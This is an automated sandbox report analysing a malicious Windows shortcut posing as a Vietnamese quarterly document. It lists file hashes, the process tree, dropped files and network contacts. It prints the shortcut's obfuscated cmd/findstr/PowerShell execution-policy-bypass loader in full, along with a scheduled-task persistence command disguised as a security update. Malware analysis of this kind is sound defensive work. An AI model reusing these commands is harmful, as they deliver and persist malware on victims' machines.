File name: | TKCT quy I nam 2019.doc.lnk.malw |
Full analysis: | https://app.any.run/tasks/748eccd0-8a7c-4401-81ef-0902419819de |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 14:45:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized |
MD5: | 80BCDA9FDE78C70566C6F693F1C7938F |
SHA1: | 579C2C17E40A70BEF8FE4B2BA0EFDE2BE89B216C |
SHA256: | 0476EC8B4CB1B5DD368BE52D9249F5B3CF6709B3141E9D02814C05F61CB90A91 |
SSDEEP: | 1536:1W4FUzI49mN+Ylv/j7OrvtqV734Uxe5VsKihr9uQZ0TEH1V8ajr5EUwTsG1hdUw2:H530U349VArO48ErKBL53Ut |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | win-2a9b78ts069 |
---|---|
IconFileName: | %SystemRoot%\system32\SHELL32.dll |
CommandLineArguments: | /c f%windir:~4,1%ndstr /b /i "iex" "%cd%\TKCT quy I nam 2019.doc.lnk">%temp%\%windir:~-1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file %temp%\%windir:~-1,1%.ps1&for /f "delims==" %i in ('dir "%temp%\TKCT quy I nam 2019.doc.lnk" /s /b') do f%windir:~4,1%ndstr /b /i "iex" "%i">%temp%\%windir:~-1,1%.ps1&p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%s -file %temp%\%windir:~-1,1%.ps1 |
RelativePath: | ..\..\..\..\Windows\System32\cmd.exe |
LocalBasePath: | C:\Windows\System32\cmd.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | cmd.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 1 |
TargetFileSize: | 302592 |
ModifyDate: | 2010:11:21 04:24:03+01:00 |
AccessDate: | 2010:11:21 04:24:03+01:00 |
CreateDate: | 2010:11:21 04:24:03+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2924 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk.malw | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2376 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2152 | "C:\Windows\System32\cmd.exe" /c f%windir:~4,1%ndstr /b /i "iex" "%cd%\TKCT quy I nam 2019.doc.lnk">C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1&for /f "delims==" %i in ('dir "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk" /s /b') do f%windir:~4,1%ndstr /b /i "iex" "%i">C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1&p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%s -file C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1 | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2736 | findstr /b /i "iex" "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk" | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2908 | powershell.exe -exec bypass -file C:\Users\admin\AppData\Local\Temp\s.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3596 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bai.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3880 | "C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\admin\AppData\Local\Temp\InstallUtil.exe | C:\Windows\system32\cmd.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2556 | "C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\winwsh.exe | C:\Windows\system32\cmd.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3060 | "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 3 /tn "Security Script kb00769670" /tr "C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt" /F | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1420 | "C:\Windows\system32\schtasks.exe" /run /tn "Security Script kb00769670" | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SF8GZ2297RU97NLCMP7.temp | — | |
MD5:— | SHA256:— | |||
3596 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR282A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0WUO6NRW4WPI69BI0YNT.temp | — | |
MD5:— | SHA256:— | |||
3596 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFCEAF0A904DDAB7C5.TMP | — | |
MD5:— | SHA256:— | |||
3596 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD1C8E79EA51975CD.TMP | — | |
MD5:— | SHA256:— | |||
636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR38A5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2808 | InstallUtil.exe | C:\Users\admin\AppData\Local\Temp\Cab424A.tmp | — | |
MD5:— | SHA256:— | |||
2808 | InstallUtil.exe | C:\Users\admin\AppData\Local\Temp\Tar424B.tmp | — | |
MD5:— | SHA256:— | |||
2808 | InstallUtil.exe | C:\Users\admin\AppData\Local\Temp\Cab425B.tmp | — | |
MD5:— | SHA256:— | |||
2808 | InstallUtil.exe | C:\Users\admin\AppData\Local\Temp\Tar425C.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2808 | InstallUtil.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.2 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2808 | InstallUtil.exe | 144.202.54.86:443 | — | Baltimore Technology Park, LLC | US | suspicious |
2808 | InstallUtil.exe | 93.184.221.240:80 | www.download.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.download.windowsupdate.com |
| whitelisted |